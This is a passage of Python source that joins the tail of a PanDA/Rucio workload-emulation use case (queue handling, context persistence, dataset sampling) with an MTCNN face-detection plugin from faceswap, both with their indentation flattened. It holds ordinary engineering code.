ctx.task_queue_select.release()
if (ctx.threads == 'False') or int(ctx.threads) < 2:
threads = None
else:
threads = int(ctx.threads)
if len(tasks):
# print '== PanDA [%s]: Finishing %s tasks.' % (time.strftime('%D %H:%M:%S', time.localtime()), len(tasks))
monitor.record_counter('panda.helper.tasks_block', len(tasks))
return {'tasks': tasks, 'threads': threads, 'safety_delay': ctx.safety_delay}
else:
if not ctx.task_print % 100:
print '== PanDA [%s]: Next task is finished in %.1f minutes (%s)' % (time.strftime('%D %H:%M:%S', time.localtime()), ((ctx.task_queue[0][0] - now) / 60), time.strftime('%D %H:%M:%S', time.localtime(ctx.task_queue[0][0])))
return None
def RESET_input(self, ctx):
print '== PanDA [%s]: Resetting input files cache' % time.strftime('%D %H:%M:%S', time.localtime())
monitor.record_counter('panda.tasks.reset', 1)
ctx.input_files = {}
return None
def RESET(self):
pass # Will never be executed, only here for semantic reasons
def QUEUE_OBSERVER(self):
pass # Will never be executed, only here for semantic reasons
def QUEUE_OBSERVER_input(self, ctx):
monitor.record_gauge('panda.tasks.queue', len(ctx.task_queue))
monitor.record_gauge('panda.jobs.queue', len(ctx.job_queue))
monitor.record_gauge('panda.subs.queue', len(ctx.sub_queue))
print '== PanDA [%s]: Task-Queue: %s / Job-Queue: %s / Sub-Queue: %s' % (time.strftime('%D %H:%M:%S', time.localtime()), len(ctx.task_queue), len(ctx.job_queue), len(ctx.sub_queue))
tmp_str = 'Job Queue\n'
tmp_str += '---------\n'
if len(ctx.job_queue) > 11:
for i in range(10):
tmp_str += '\t%s: %s\n' % (i, time.strftime('%D %H:%M:%S', time.localtime(ctx.job_queue[i][0])))
tmp_str += '---------'
print tmp_str
return None # Indicates that no further action is required
def setup(self, ctx):
"""
Sets up shared information/objects between the use cases and creates between one
and ten empty datasets for the UC_TZ_REGISTER_APPEND use case.
:param ctx: the context of etc/emulation.cfg
"""
# As long as there is no database filler, one dataset and n files are created here
ctx.job_queue = []
ctx.job_queue_mutex = threading.Lock()
ctx.job_queue_select = threading.Lock()
ctx.job_print = 0
ctx.sub_queue = []
ctx.sub_queue_mutex = threading.Lock()
ctx.sub_queue_select = threading.Lock()
ctx.sub_print = 0
ctx.task_queue = []
ctx.task_queue_mutex = threading.Lock()
ctx.task_queue_select = threading.Lock()
ctx.task_print = 0
try:
print '== PanDA [%s]: Loading context file' % (time.strftime('%D %H:%M:%S', time.localtime()))
with open('/data/emulator/panda.ctx', 'r') as f:
stuff = pickle.load(f)
delta = (time.time() - stuff[0]) + 135 # safety
print '== PanDA [%s]: Start importing previous context (written at: %s / delta: %.2f min)' % (time.strftime('%D %H:%M:%S', time.localtime()),
time.strftime('%D %H:%M:%S', time.localtime(stuff[0])), (delta / 60))
ctx.job_queue = sorted(stuff[1])
for job in ctx.job_queue:
job[0] += delta
print '== PanDA [%s]: Re-imported %s jobs to queue (min: %s / max: %s).' % (time.strftime('%D %H:%M:%S', time.localtime()), len(ctx.job_queue),
time.strftime('%D %H:%M:%S', time.localtime(ctx.job_queue[0][0])), time.strftime('%D %H:%M:%S', time.localtime(ctx.job_queue[-1][0])))
ctx.sub_queue = sorted(stuff[2])
for sub in ctx.sub_queue:
sub[0] += delta
print '== PanDA [%s]: Re-imported %s subs to queue (min: %s / max: %s).' % (time.strftime('%D %H:%M:%S', time.localtime()), len(ctx.sub_queue),
time.strftime('%D %H:%M:%S', time.localtime(ctx.sub_queue[0][0])), time.strftime('%D %H:%M:%S', time.localtime(ctx.sub_queue[-1][0])))
ctx.task_queue = sorted(stuff[3])
for task in ctx.task_queue:
task[0] += delta
print '== PanDA [%s]: Re-imported %s tasks to queue (min: %s / max: %s).' % (time.strftime('%D %H:%M:%S', time.localtime()), len(ctx.task_queue),
time.strftime('%D %H:%M:%S', time.localtime(ctx.task_queue[0][0])), time.strftime('%D %H:%M:%S', time.localtime(ctx.task_queue[-1][0])))
del stuff
except IOError:
print '== PanDA: No information about former execution found'
except EOFError:
print '== PanDA: Panda context file found, but unable to load it.'
ctx.input_files = {}
client = Client(account='panda')
ctx.users = list()
ctx.groups = list()
for a in client.list_accounts():
if a['type'] == 'USER' and a['account'].startswith('user'):
ctx.users.append(a['account'])
if a['type'] == 'GROUP':
ctx.groups.append(a['account'])
ctx.rses = []
for rse in client.list_rses():
if rse['deterministic']:
ctx.rses.append(rse['rse'])
# TODO: Could be done in a more elegant way I guess
ctx.task_distribution = list()
for task in ctx.tasks:
for i in xrange(ctx.tasks[task]['probability']):
ctx.task_distribution.append(task)
def update_ctx(self, key_chain, value):
ctx = super(UseCaseDefinition, self).update_ctx(key_chain, value)
# Update task distribution
if key_chain[0] == 'tasks' and key_chain[-1] == 'probability':
print '== PanDA: Updating task distribution'
# TODO: Could be done in a more elegant way I guess
task_distribution = list()
for task in ctx.tasks:
for i in xrange(ctx.tasks[task]['probability']):
task_distribution.append(task)
ctx.task_distribution = task_distribution
def select_input_ds(self, task_type, ctx):
dist_prefix = '/data/mounted_hdfs/user/serfon/listdatasets2/'
success = False
retry = 0
while not success:
retry += 1
try:
# Derive dataset age
cluster = random()
i = 0
distr = ctx.input_distribution
for age_cluster in distr:
if cluster < age_cluster[1]:
break
i += 1
if i == 0: # First element
age = randint(0, distr[0][0])
elif i == len(distr): # Last element
age = randint(distr[i - 1][0] + 1, distr[-1][0])
else: # Some in between element
age = randint(distr[i - 1][0] + 1, distr[i][0])
# Select random input ds-type
input_ds_type = choice(ctx.tasks[task_type]['input']['meta'])
# Select random dataset from file with according age
date = datetime.date.today() - datetime.timedelta(days=age)
dist_file = '%s/%02d/%02d/listfiles.%s.%s.txt' % (date.year, date.month, date.day, input_ds_type.split('.')[0], input_ds_type.split('.')[1])
path = dist_prefix + dist_file
if dist_file not in ctx.input_files: # File is used for the first time
ctx.input_files[dist_file] = (os.path.getsize(path) / 287)
if ctx.input_files[dist_file] is False:  # It is known that this file doesn't exist
continue
ds = None
with open(path) as f:
f.seek(randint(0, ctx.input_files[dist_file] - 1) * 287)
ds = f.readline().split()
success = True
except Exception, e:
ctx.input_files[dist_file] = False  # Remember that this file doesn't exist
print '!! ERROR !! Cannot read dataset name from distribution file: %s' % e
if retry > 5:
return 0
return ds
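# [Editor's illustrative sketch, never called] select_input_ds above treats the listing
# files as fixed-width records of 287 bytes, so a random dataset name can be picked by
# seeking to a random multiple of the record size. The helper below isolates that access
# pattern; the 287-byte width is taken from the code above, the rest is assumption.
def _pick_random_record_sketch(path, record_size=287):
    import os
    from random import randint
    n_records = os.path.getsize(path) // record_size  # number of fixed-width records
    with open(path) as f:
        f.seek(randint(0, n_records - 1) * record_size)  # jump to a random record start
        return f.readline().split()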
def shutdown(self, ctx):
monitor.record_gauge('panda.tasks.queue', 0)
monitor.record_gauge('panda.jobs.queue', 0)
monitor.record_gauge('panda.subs.queue', 0)
print '== PanDA [%s]: Persisting jobs: %s (first: %s, last: %s)' % (time.strftime('%D %H:%M:%S', time.localtime()), len(ctx.job_queue), time.strftime('%D %H:%M:%S', time.localtime(ctx.job_queue[0][0])),
time.strftime('%D %H:%M:%S', time.localtime(ctx.job_queue[-1][0])))
print '== PanDA [%s]: Persisting subs: %s (first: %s, last: %s)' % (time.strftime('%D %H:%M:%S', time.localtime()), len(ctx.sub_queue), time.strftime('%D %H:%M:%S', time.localtime(ctx.sub_queue[0][0])),
time.strftime('%D %H:%M:%S', time.localtime(ctx.sub_queue[-1][0])))
print '== PanDA [%s]: Persisting tasks: %s (first: %s, last: %s)' % (time.strftime('%D %H:%M:%S', time.localtime()), len(ctx.task_queue), time.strftime('%D %H:%M:%S', time.localtime(ctx.task_queue[0][0])),
time.strftime('%D %H:%M:%S', time.localtime(ctx.task_queue[-1][0])))
with ctx.job_queue_mutex:
with ctx.sub_queue_mutex:
with ctx.task_queue_mutex:
with open('/data/emulator/panda.ctx', 'w') as f:
pickle.dump([time.time(), ctx.job_queue, ctx.sub_queue, ctx.task_queue], f, pickle.HIGHEST_PROTOCOL)
print '== PanDA [%s]: Persisted context file.' % (time.strftime('%D %H:%M:%S', time.localtime()))
|
mtcnn.py
|
#!/usr/bin/env python3
""" MTCNN Face detection plugin """
from __future__ import absolute_import, division, print_function
import os
from six import string_types, iteritems
import cv2
import numpy as np
from lib.multithreading import MultiThread
from ._base import BoundingBox, Detector, logger
# Must import tensorflow inside the spawned process
# for Windows machines
tf = None # pylint: disable = invalid-name
def import_tensorflow():
""" Import tensorflow from inside spawned process """
global tf # pylint: disable = invalid-name,global-statement
import tensorflow as tflow
tf = tflow
class Detect(Detector):
""" MTCNN detector for face recognition """
def __init__(self, **kwargs):
git_model_id = 2
model_filename = ["mtcnn_det_v1.1.npy", "mtcnn_det_v1.2.npy", "mtcnn_det_v1.3.npy"]
super().__init__(git_model_id=git_model_id, model_filename=model_filename, **kwargs)
self.kwargs = self.validate_kwargs()
self.name = "mtcnn"
self.target = 2073600 # Uses approx 1.30 GB of VRAM
self.vram = 1408
def validate_kwargs(self):
""" Validate that config options are correct. If not reset to default """
valid = True
threshold = [self.config["threshold_1"],
self.config["threshold_2"],
self.config["threshold_3"]]
kwargs = {"minsize": self.config["minsize"],
"threshold": threshold,
"factor": self.config["scalefactor"]}
if kwargs["minsize"] < 10:
valid = False
elif not all(0.0 < threshold <= 1.0 for threshold in kwargs['threshold']):
valid = False
elif not 0.0 < kwargs['factor'] < 1.0:
valid = False
if not valid:
kwargs = {"minsize": 20, # minimum size of face
"threshold": [0.6, 0.7, 0.7], # three steps threshold
"factor": 0.709} # scale factor
logger.warning("Invalid MTCNN options in config. Running with defaults")
logger.debug("Using mtcnn kwargs: %s", kwargs)
return kwargs
def initialize(self, *args, **kwargs):
""" Create the mtcnn detector """
try:
super().initialize(*args, **kwargs)
logger.info("Initializing MTCNN Detector...")
is_gpu = False
# Must import tensorflow inside the spawned process
# for Windows machines
import_tensorflow()
_, vram_free, _ = self.get_vram_free()
mtcnn_graph = tf.Graph()
# Windows machines sometimes misreport available vram, and overuse
# causing OOM. Allow growth fixes that
config = tf.ConfigProto()
config.gpu_options.allow_growth = True # pylint: disable=no-member
with mtcnn_graph.as_default(): # pylint: disable=not-context-manager
sess = tf.Session(config=config)
with sess.as_default(): # pylint: disable=not-context-manager
pnet, rnet, onet = create_mtcnn(sess, self.model_path)
if any("gpu" in str(device).lower()
for device in sess.list_devices()):
logger.debug("Using GPU")
is_gpu = True
mtcnn_graph.finalize()
if not is_gpu:
alloc = 2048
logger.warning("Using CPU")
else:
alloc = vram_free
logger.debug("Allocated for Tensorflow: %sMB", alloc)
self.batch_size = int(alloc / self.vram)
if self.batch_size < 1:
self.error.set()
raise ValueError("Insufficient VRAM available to continue "
"({}MB)".format(int(alloc)))
logger.verbose("Processing in %s threads", self.batch_size)
self.kwargs["pnet"] = pnet
self.kwargs["rnet"] = rnet
self.kwargs["onet"] = onet
self.init.set()
logger.info("Initialized MTCNN Detector.")
except Exception as err:
self.error.set()
raise err
def detect_faces(self, *args, **kwargs):
""" Detect faces in Multiple Threads """
super().detect_faces(*args, **kwargs)
workers = MultiThread(target=self.detect_thread, thread_count=self.batch_size)
workers.start()
workers.join()
sentinel = self.queues["in"].get()
self.queues["out"].put(sentinel)
logger.debug("Detecting Faces complete")
def detect_thread(self):
""" Detect faces in rgb image """
logger.debug("Launching Detect")
while True:
item = self.get_item()
if item == "EOF":
break
logger.trace("Detecting faces: '%s'", item["filename"])
[detect_image, scale] = self.compile_detection_image(item["image"], to_rgb=True)
for angle in self.rotation:
current_image, rotmat = self.rotate_image(detect_image, angle)
faces, points = detect_face(current_image, **self.kwargs)
if angle != 0 and faces.any():
logger.verbose("found face(s) by rotating image %s degrees", angle)
if faces.any():
break
detected_faces = self.process_output(faces, points, rotmat, scale)
item["detected_faces"] = detected_faces
self.finalize(item)
logger.debug("Thread Completed Detect")
def process_output(self, faces, points, rotation_matrix, scale):
""" Compile found faces for output """
logger.trace("Processing Output: (faces: %s, points: %s, rotation_matrix: %s)",
faces, points, rotation_matrix)
faces = self.recalculate_bounding_box(faces, points)
faces = [BoundingBox(face[0], face[1], face[2], face[3]) for face in faces]
if isinstance(rotation_matrix, np.ndarray):
faces = [self.rotate_rect(face, rotation_matrix)
for face in faces]
detected = [BoundingBox(face.left / scale, face.top / scale,
face.right / scale, face.bottom / scale)
for face in faces]
logger.trace("Processed Output: %s", detected)
return detected
@staticmethod
def recalculate_bounding_box(faces, landmarks):
""" Recalculate the bounding box for Face Alignment.
Resize the bounding box around features to present
a better box to Face Alignment. Helps its chances
on edge cases and helps remove 'jitter' """
logger.trace("Recalculating Bounding Boxes: (faces: %s, landmarks: %s)",
faces, landmarks)
retval = list()
no_faces = len(faces)
if no_faces == 0:
return retval
face_landmarks = np.hsplit(landmarks, no_faces)
for idx in range(no_faces):
pts = np.reshape(face_landmarks[idx], (5, 2), order="F")
nose = pts[2]
minmax = (np.amin(pts, axis=0), np.amax(pts, axis=0))
padding = [(minmax[1][0] - minmax[0][0]) / 2,
(minmax[1][1] - minmax[0][1]) / 2]
center = (minmax[1][0] - padding[0], minmax[1][1] - padding[1])
offset = (center[0] - nose[0], nose[1] - center[1])
center = (center[0] + offset[0], center[1] + offset[1])
padding[0] += padding[0]
padding[1] += padding[1]
bounding = [center[0] - padding[0], center[1] - padding[1],
center[0] + padding[0], center[1] + padding[1]]
retval.append(bounding)
logger.trace("Recalculated Bounding Boxes: %s", retval)
return retval
# MTCNN Detector for face alignment
# Code adapted from: https://github.com/davidsandberg/facenet
# Tensorflow implementation of the face detection / alignment algorithm
# found at
# https://github.com/kpzhang93/MTCNN_face_detection_alignment
# MIT License
#
# Copyright (c) 2016 David Sandberg
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
def layer(operator):
"""Decorator for composable network layers."""
def layer_decorated(self, *args, **kwargs):
# Automatically set a name if not provided.
name = kwargs.setdefault('name', self.get_unique_name(operator.__name__))
# Figure out the layer inputs.
if len(self.terminals) == 0: # pylint: disable=len-as-condition
raise RuntimeError('No input variables found for layer %s.' % name)
elif len(self.terminals) == 1:
layer_input = self.terminals[0]
else:
layer_input = list(self.terminals)
# Perform the operation and get the output.
layer_output = operator(self, layer_input, *args, **kwargs)
# Add to layer LUT.
self.layers[name] = layer_output
# This output is now the input for the next layer.
self.feed(layer_output)
# Return self for chained calls.
return self
return layer_decorated
class Network():
""" Tensorflow Network """
def __init__(self, inputs, trainable=True):
# The input nodes for this network
self.inputs = inputs
# The current list of terminal nodes
self.terminals = []
# Mapping from layer names to layers
self.layers = dict(inputs)
# If true, the resulting variables are set as trainable
self.trainable = trainable
self.setup()
def setup(self):
"""Construct the network. """
raise NotImplementedError('Must be implemented by the subclass.')
@staticmethod
def load(model_path, session, ignore_missing=False):
"""Load network weights.
model_path: The path to the numpy-serialized network weights
session: The current TensorFlow session
ignore_missing: If true, serialized weights for missing layers are
ignored.
"""
# pylint: disable=no-member
data_dict = np.load(model_path, encoding='latin1').item()
for op_name in data_dict:
with tf.variable_scope(op_name, reuse=True):
for param_name, data in iteritems(data_dict[op_name]):
try:
var = tf.get_variable(param_name)
session.run(var.assign(data))
except ValueError:
if not ignore_missing:
raise
def feed(self, *args):
"""Set the input(s) for the next operation by replacing the terminal nodes.
The arguments can be either layer names or the actual layers.
"""
assert len(args) != 0 # pylint: disable=len-as-condition
self.terminals = []
for fed_layer in args:
if isinstance(fed_layer, string_types):
try:
fed_layer = self.layers[fed_layer]
except KeyError:
raise KeyError('Unknown layer name fed: %s' % fed_layer)
self.terminals.append(fed_layer)
return self
def get_output(self):
"""Returns the current network output."""
return self.terminals[-1]
def get_unique_name(self, prefix):
"""Returns an index-suffixed unique name for the given prefix.
This is used for auto-generating layer names based on the type-prefix.
"""
ident = sum(t.startswith(prefix) for t, _ in self.layers.items()) + 1
return '%s_%d' % (prefix, ident)
def make_var(self, name, shape):
"""Creates a new TensorFlow variable."""
return tf.get_variable(name, shape, trainable=self.trainable)
@staticmethod
def validate_padding(padding):
"""Verifies that the padding is one of the supported ones."""
assert padding in ('SAME', 'VALID')
@layer
def conv(self, # pylint: disable=too-many-arguments
inp,
k_h,
k_w,
c_o,
s_h,
s_w,
name,
relu=True,
padding='SAME',
group=1,
biased=True):
""" Conv Layer """
# pylint: disable=too-many-locals
# Verify that the padding is acceptable
self.validate_padding(padding)
# Get the number of channels in the input
c_i = int(inp.get_shape()[-1])
# Verify that the grouping parameter is valid
assert c_i % group == 0
assert c_o % group == 0
# Convolution for a given input and kernel
convolve = lambda i, k: tf.nn.conv2d(i, k, [1, s_h, s_w, 1], padding=padding) # noqa
with tf.variable_scope(name) as scope:
kernel = self.make_var('weights',
shape=[k_h, k_w, c_i // group, c_o])
# This is the common-case. Convolve the input without any
# further complications.
output = convolve(inp, kernel)
# Add the biases
if biased:
biases = self.make_var('biases', [c_o])
output = tf.nn.bias_add(output, biases)
if relu:
# ReLU non-linearity
output = tf.nn.relu(output, name=scope.name)
return output
@layer
def prelu(self, inp, name):
""" Prelu Layer """
with tf.variable_scope(name):
i = int(inp.get_shape()[-1])
alpha = self.make_var('alpha', shape=(i,))
output = tf.nn.relu(inp) + tf.multiply(alpha, -tf.nn.relu(-inp))
return output
@layer
def max_pool(self, inp, k_h, k_w, # pylint: disable=too-many-arguments
s_h, s_w, name, padding='SAME'):
""" Max Pool Layer """
self.validate_padding(padding)
return tf.nn.max_pool(inp,
ksize=[1, k_h, k_w, 1],
strides=[1, s_h, s_w, 1],
padding=padding,
name=name)
@layer
def fc(self, inp, num_out, name, relu=True): # pylint: disable=invalid-name
""" FC Layer """
with tf.variable_scope(name):
input_shape = inp.get_shape()
if input_shape.ndims == 4:
# The input is spatial. Vectorize it first.
dim = 1
for this_dim in input_shape[1:].as_list():
dim *= int(this_dim)
feed_in = tf.reshape(inp, [-1, dim])
else:
feed_in, dim = (inp, input_shape[-1].value)
weights = self.make_var('weights', shape=[dim, num_out])
biases = self.make_var('biases', [num_out])
operator = tf.nn.relu_layer if relu else tf.nn.xw_plus_b
fc = operator(feed_in, weights, biases, name=name) # pylint: disable=invalid-name
return fc
@layer
def softmax(self, target, axis, name=None): # pylint: disable=no-self-use
""" Multi dimensional softmax,
refer to https://github.com/tensorflow/tensorflow/issues/210
compute softmax along the dimension of target
the native softmax only supports batch_size x dimension """
max_axis = tf.reduce_max(target, axis, keepdims=True)
target_exp = tf.exp(target-max_axis)
normalize = tf.reduce_sum(target_exp, axis, keepdims=True)
softmax = tf.div(target_exp, normalize, name)
return softmax
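# [Editor's illustrative sketch, never called] The softmax layer above subtracts the
# per-axis maximum before exponentiating for numerical stability. The same computation
# in plain numpy, purely for illustration (not used by the network):
def _softmax_numpy_sketch(target, axis):
    shifted = target - np.max(target, axis=axis, keepdims=True)  # stabilise the exponent
    exps = np.exp(shifted)
    return exps / np.sum(exps, axis=axis, keepdims=True)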
class PNet(Network):
""" Tensorflow PNet """
def setup(self):
(self.feed('data') # pylint: disable=no-value-for-parameter, no-member
.conv(3, 3, 10, 1, 1, padding='VALID', relu=False, name='conv1')
.prelu(name='PReLU1')
.max_pool(2, 2, 2, 2, name='pool1')
.conv(3, 3, 16, 1, 1, padding='VALID', relu=False, name='conv2')
.prelu(name='PReLU2')
.conv(3, 3, 32, 1, 1, padding='VALID', relu=False, name='conv3')
.prelu(name='PReLU3')
.conv(1, 1, 2, 1, 1, relu=False, name='conv4-1')
.softmax(3, name='prob1'))
(self.feed('PReLU3') # pylint: disable=no-value-for-parameter
.conv(1, 1, 4, 1, 1, relu=False, name='conv4-2'))
class RNet(Network):
""" Tensorflow RNet """
def setup(self):
(self.feed('data') # pylint: disable=no-value-for-parameter, no-member
.conv(3, 3, 28, 1, 1, padding='VALID', relu=False, name='conv1')
.prelu(name='prelu1')
.max_pool(3, 3, 2, 2, name='pool1')
.conv(3, 3, 48, 1, 1, padding='VALID', relu=False, name='conv2')
.prelu(name='prelu2')
.max_pool(3, 3, 2, 2, padding='VALID', name='pool2')
.conv(2, 2, 64, 1, 1, padding='VALID', relu=False, name='conv3')
.prelu(name='prelu3')
.fc(128, relu=False, name='conv4')
.prelu(name='prelu4')
.fc(2, relu=False, name='conv5-1')
.softmax(1, name='prob1'))
(self.feed('prelu4') # pylint: disable=no-value-for-parameter
.fc(4, relu=False, name='conv5-2'))
class ONet(Network):
""" Tensorflow ONet """
def setup(self):
(self.feed('data') # pylint: disable=no-value-for-parameter, no-member
.conv(3, 3, 32, 1, 1, padding='VALID', relu=False, name='conv1')
.prelu(name='prelu1')
.max_pool(3, 3, 2, 2, name='pool1')
.conv(3, 3, 64, 1, 1, padding='VALID', relu=False, name='conv2')
.prelu(name='prelu2')
.max_pool(3, 3, 2, 2, padding='VALID', name='pool2')
.conv(3, 3, 64, 1, 1, padding='VALID', relu=False, name='conv3')
.prelu(name='prelu3')
.max_pool(2, 2, 2, 2, name='pool3')
.conv(2, 2, 128, 1, 1, padding='VALID', relu=False, name='conv4')
.prelu(name='prelu4')
.fc(256, relu=False, name='conv5')
.prelu(name='prelu5')
.fc(2, relu=False, name='conv6-1')
.softmax(1, name='prob1'))
(self.feed('prelu5') # pylint: disable=no-value-for-parameter
.fc(4, relu=False, name='conv6-2'))
(self.feed('prelu5') # pylint: disable=no-value-for-parameter
.fc(10, relu=False, name='conv6-3'))
def create_mtcnn(sess, model_path):
""" Create the network """
if not model_path:
model_path, _ = os.path.split(os.path.realpath(__file__))
with tf.variable_scope('pnet'):
data = tf.placeholder(tf.float32, (None, None, None, 3), 'input')
pnet = PNet({'data': data})
pnet.load(model_path[0], sess)
with tf.variable_scope('rnet'):
data = tf.placeholder(tf.float32, (None, 24, 24, 3), 'input')
rnet = RNet({'data': data})
rnet.load(model_path[1], sess)
with tf.variable_scope('onet'):
data = tf.placeholder(tf.float32, (None, 48, 48, 3), 'input')
onet = ONet({'data': data})
onet.load(model_path[2], sess)
pnet_fun = lambda img: sess.run(('pnet/conv4-2/BiasAdd:0', # noqa
'pnet/prob1:0'),
feed_dict={'pnet/input:0': img})
rnet_fun = lambda img: sess.run(('rnet/conv5-2/conv5-2:0', # noqa
'rnet/prob1:0'),
feed_dict={'rnet/input:0': img})
onet_fun = lambda img: sess.run(('onet/conv6-2/conv6-2:0', # noqa
'onet/conv6-3/conv6-3:0',
'onet/prob1:0'),
feed_dict={'onet/input:0': img})
return pnet_fun, rnet_fun, onet_fun
def detect_face(img, minsize, pnet, rnet, # pylint: disable=too-many-arguments
onet, threshold, factor):
"""Detects faces in an image, and returns bounding boxes and points for them.
img: input image
minsize: minimum faces' size
pnet, rnet, onet: caffemodel
threshold: threshold=[th1, th2, th3]; th1-3 are the thresholds for the three steps
factor: the factor used to create a scaling pyramid of face sizes to
detect in the image.
"""
# pylint: disable=too-many-locals,too-many-statements,too-many-branches
factor_count = 0
total_boxes = np.empty((0, 9))
points = np.empty(0)
height = img.shape[0]
width = img.shape[1]
minl = np.amin([height, width])
var_m = 12.0 / minsize
minl = minl * var_m
# create scale pyramid
scales = []
while minl >= 12:
scales += [var_m * np.power(factor, factor_count)]
minl = minl * factor
factor_count += 1
# # # # # # # # # # # # #
# first stage - fast proposal network (pnet) to obtain face candidates
# # # # # # # # # # # # #
for scale in scales:
height_scale = int(np.ceil(height * scale))
width_scale = int(np.ceil(width * scale))
im_data = imresample(img, (height_scale, width_scale))
im_data = (im_data - 127.5) * 0.0078125
img_x = np.expand_dims(im_data, 0)
img_y = np.transpose(img_x, (0, 2, 1, 3))
out = pnet(img_y)
out0 = np.transpose(out[0], (0, 2, 1, 3))
out1 = np.transpose(out[1], (0, 2, 1, 3))
boxes, _ = generate_bounding_box(out1[0, :, :, 1].copy(),
out0[0, :, :, :].copy(),
scale, threshold[0])
# inter-scale nms
pick = nms(boxes.copy(), 0.5, 'Union')
if boxes.size > 0 and pick.size > 0:
boxes = boxes[pick, :]
total_boxes = np.append(total_boxes, boxes, axis=0)
numbox = total_boxes.shape[0]
if numbox > 0:
pick = nms(total_boxes.copy(), 0.7, 'Union')
total_boxes = total_boxes[pick, :]
regw = total_boxes[:, 2]-total_boxes[:, 0]
regh = total_boxes[:, 3]-total_boxes[:, 1]
qq_1 = total_boxes[:, 0]+total_boxes[:, 5] * regw
qq_2 = total_boxes[:, 1]+total_boxes[:, 6] * regh
qq_3 = total_boxes[:, 2]+total_boxes[:, 7] * regw
qq_4 = total_boxes[:, 3]+total_boxes[:, 8] * regh
total_boxes = np.transpose(np.vstack([qq_1, qq_2, qq_3, qq_4, total_boxes[:, 4]]))
total_boxes = rerec(total_boxes.copy())
total_boxes[:, 0:4] = np.fix(total_boxes[:, 0:4]).astype(np.int32)
d_y, ed_y, d_x, ed_x, var_y, e_y, var_x, e_x, tmpw, tmph = pad(total_boxes.copy(),
width, height)
numbox = total_boxes.shape[0]
# # # # # # # # # # # # #
# second stage - refinement of face candidates with rnet
# # # # # # # # # # # # #
if numbox > 0:
tempimg = np.zeros((24, 24, 3, numbox))
for k in range(0, numbox):
tmp = np.zeros((int(tmph[k]), int(tmpw[k]), 3))
tmp[d_y[k] - 1:ed_y[k], d_x[k] - 1:ed_x[k], :] = img[var_y[k] - 1:e_y[k],
var_x[k]-1:e_x[k], :]
if tmp.shape[0] > 0 and tmp.shape[1] > 0 or tmp.shape[0] == 0 and tmp.shape[1] == 0:
tempimg[:, :, :, k] = imresample(tmp, (24, 24))
else:
return np.empty((0, 9)), np.empty(0)  # invalid crop: return empty boxes and points
tempimg = (tempimg-127.5)*0.0078125
tempimg1 = np.transpose(tempimg, (3, 1, 0, 2))
out = rnet(tempimg1)
out0 = np.transpose(out[0])
out1 = np.transpose(out[1])
score = out1[1, :]
ipass = np.where(score > threshold[1])
total_boxes = np.hstack([total_boxes[ipass[0], 0:4].copy(),
np.expand_dims(score[ipass].copy(), 1)])
m_v = out0[:, ipass[0]]
if total_boxes.shape[0] > 0:
pick = nms(total_boxes, 0.7, 'Union')
total_boxes = total_boxes[pick, :]
total_boxes = bbreg(total_boxes.copy(), np.transpose(m_v[:, pick]))
total_boxes = rerec(total_boxes.copy())
numbox = total_boxes.shape[0]
# # # # # # # # # # # # #
# third stage - further refinement and facial landmarks positions with onet
# NB: Facial landmarks code commented out for faceswap
# # # # # # # # # # # # #
if numbox > 0:
# third stage
total_boxes = np.fix(total_boxes).astype(np.int32)
d_y, ed_y, d_x, ed_x, var_y, e_y, var_x, e_x, tmpw, tmph = pad(total_boxes.copy(),
width, height)
tempimg = np.zeros((48, 48, 3, numbox))
for k in range(0, numbox):
tmp = np.zeros((int(tmph[k]), int(tmpw[k]), 3))
tmp[d_y[k] - 1:ed_y[k], d_x[k] - 1:ed_x[k], :] = img[var_y[k] - 1:e_y[k],
var_x[k] - 1:e_x[k], :]
if tmp.shape[0] > 0 and tmp.shape[1] > 0 or tmp.shape[0] == 0 and tmp.shape[1] == 0:
tempimg[:, :, :, k] = imresample(tmp, (48, 48))
else:
return np.empty((0, 9)), np.empty(0)  # invalid crop: return empty boxes and points
tempimg = (tempimg-127.5)*0.0078125
tempimg1 = np.transpose(tempimg, (3, 1, 0, 2))
out = onet(tempimg1)
out0 = np.transpose(out[0])
out1 = np.transpose(out[1])
out2 = np.transpose(out[2])
score = out2[1, :]
points = out1
ipass = np.where(score > threshold[2])
points = points[:, ipass[0]]
total_boxes = np.hstack([total_boxes[ipass[0], 0:4].copy(),
np.expand_dims(score[ipass].copy(), 1)])
m_v = out0[:, ipass[0]]
width = total_boxes[:, 2] - total_boxes[:, 0] + 1
height = total_boxes[:, 3] - total_boxes[:, 1] + 1
points[0:5, :] = (np.tile(width, (5, 1)) * points[0:5, :] +
np.tile(total_boxes[:, 0], (5, 1)) - 1)
points[5:10, :] = (np.tile(height, (5, 1)) * points[5:10, :] +
np.tile(total_boxes[:, 1], (5, 1)) - 1)
if total_boxes.shape[0] > 0:
total_boxes = bbreg(total_boxes.copy(), np.transpose(m_v))
pick = nms(total_boxes.copy(), 0.7, 'Min')
total_boxes = total_boxes[pick, :]
points = points[:, pick]
return total_boxes, points
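# [Editor's illustrative sketch, never called] The scale pyramid built at the top of
# detect_face: the image (rescaled by 12/minsize) is repeatedly shrunk by `factor`
# until its shorter side drops below 12 px. The image size used here is an assumption
# for demonstration only.
def _scale_pyramid_example(height=720, width=1280, minsize=20, factor=0.709):
    scales = []
    minl = min(height, width) * (12.0 / minsize)
    factor_count = 0
    while minl >= 12:
        scales.append((12.0 / minsize) * np.power(factor, factor_count))
        minl *= factor
        factor_count += 1
    return scales  # e.g. ~0.60, 0.43, 0.30, ... down to the 12 px limit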
# function [boundingbox] = bbreg(boundingbox,reg)
def bbreg(boundingbox, reg):
"""Calibrate bounding boxes"""
if reg.shape[1] == 1:
reg = np.reshape(reg, (reg.shape[2], reg.shape[3]))
width = boundingbox[:, 2] - boundingbox[:, 0] + 1
height = boundingbox[:, 3] - boundingbox[:, 1] + 1
